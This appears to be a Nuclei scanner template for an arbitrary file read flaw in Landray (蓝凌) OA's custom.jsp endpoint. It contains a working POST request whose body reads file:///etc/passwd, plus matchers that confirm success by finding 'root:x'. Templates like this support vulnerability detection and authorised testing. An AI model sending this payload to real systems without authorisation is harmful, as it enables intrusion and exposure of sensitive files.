id: lanlin-oa-fileRead

info:
  name: 蓝凌OA custom.jsp 任意文件读取漏洞
  author: Str1am
  severity: high
  tags: lanlin,oa

requests:
  - raw:
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        content-type: application/x-www-form-urlencoded

        var={"body":{"file":"file:///etc/passwd"}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root:x"
        part: body
        condition: and